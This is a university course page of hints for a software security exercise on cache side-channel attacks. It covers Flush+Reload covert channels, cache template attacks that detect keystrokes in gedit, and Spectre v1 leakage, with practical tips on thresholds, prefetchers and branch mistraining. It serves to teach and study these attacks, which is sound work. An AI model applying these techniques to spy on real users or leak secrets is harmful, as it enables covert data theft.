Exercise 1: Software Security
Next Deadline: Monday, May 3 2021, 8:00am, Task 2-4
Additional Information and Hints
This page is meant as additional information and hints, for questions not answered here, try one of the support channels.
The tools and code are generally made for Linux, though porting cacheutils to Windows is possible. We do not provide a windows library for task 4, you will need to develop this on linux. However, all tasks, including task 4, should work in WSL (with the exception of code that relies on virtual to physical memory translation, such as the
Prime+Probe calibration tool). The cache template attack reference is also only provided as a linux binary.
Similar to WSL, most things can be done in VMs, but in general we recommend solving the tasks on native Linux, to avoid any issues.
If you have both Intel and AMD available to you, you may find it easier to work on an Intel CPU. While all of the concepts used in this excercise should apply to both, some implementations (such as
Prime+Probe in the demos folder) are configured for an Intel cache layout. If you encounter unexpected behaviour or are unsure about the CPU available to you, don’t hesitate to ask.
It is very helpful to use cpupower or cpufreq-utils to set the system to performance mode (”sudo cpupower -c all set -b 0”). It will make your results more reliable and reproducible.
Do not rely on the threshold the calibration tools suggest. We provided you with the knowledge to choose a good threshold for a reason. Use your knowledge and choose a good threshold on your own.
We recommend compiling with -Os or -O3 for best performance with cache attacks.
Whenever you iterate over memory – consider the prefetcher. It is the prefetchers job to load memory it thinks you will need into the cache. When you’re doing cache attacks, this will ruin your day.
On Intel, the prefetcher will recognize patterns within a page – on AMD even when accesses are spaced out over multiple pages!
Use the following code snippet to “randomize” the iterator i (here from 0 to 255) enough to confuse prefetchers:
int mix_i = ((i * 167) + 13) & 255
Use mix_i to index your memory instead of i.
Another annoying prefetcher is the adjacent line prefetcher. Whenever a line is loaded, the adjacent line is cached as well. Keep that in mind.
- I’m on a Zen CPU, my F+R calibration works, but I don’t see anything on my covert channel between 2 threads, what’s going on?
Zen CPUs group cores together in packages, each with their own L3. This can mean that your CPU has more than 1 L3, and F+R won’t work accross them.
You can check which core uses which L3 by running
lscpu -e, the L3 column tell you what you need to know.
You can solve this problem by restricting your program to cores that share an L3, e.g. with
tasket -c X,Y ./channel.
The section “User configuration” contains the most important settings, the default cache miss timing and the timer to be used. On Intel CPUs,
rdtscpshould both work fine. On newer AMD CPUs (>Zen), you may want to try
rdprufor increased accuracy.
Task 1 – Cache Histogram
Task 2 – Cache Covert Channel
Spawn two different processes that communicate with each other via a cache covert channel. If you use
Flush+Reload, this will include establishing some type of shared memory.
There are no restrictions on how you start the transmission initially (you may even write to shared memory), but once it has started, no more direct communication is allowed.
You may use any schemes to keep the processes synchronized, though we recommend the KISS principle.
Threads refers to the number of threads in total, counting both sender and receiver.
Task 3 – Cache Template Attacks
You can find the tools shown in the lecture in your task3 subfolder.
If you want to reproduce the example shown in the lecture:
There are different gedit versions. Some use a ”libgedit-private.so”. Check whether your gedit does using ”cat /proc/$(pidof gedit)/maps | grep libgedit”.
If so, you should attack this file instead of ”/usr/bin/gedit” as this is more likely to be successful.
The .text section of the binary does not start at 0x0. Setting the offset (”./spy ”) to the start of the .text section will lower your search time.
As soon as you found 1-2 significant peaks you can stop the search, it’s already enough for the exploitation.
For Task 3, you have to implement both parts of this yourself.
-> Implement one program that lets you find addresses that react to events (i.e., keystrokes), and another one that checks your list of addresses regularly and outputs corresponding info.
Distinguishing different keys is very advanced. We don’t expect anyone to do that, though it would earn you bonus points.
Task 4 – Spectre
Familiarize yourself with the basic principle of Spectre-PHT, aka Spectre v1.
The library contains a branch that you can mistrain. If you do it right, you can then extract the secret with
Flush+Reload, as explained in the lecture.
Start your implementation small! Try to leak only one known character in the beginning. Repeat the experiments often, and try different training parameters.
If you’re getting nothing but garbage, look at your cache threshold and the prefetcher tips.
If you see leakage but it is very slow, think about what you could do to slow down the branch you’re mistraining. What are its dependencies, can you stall them?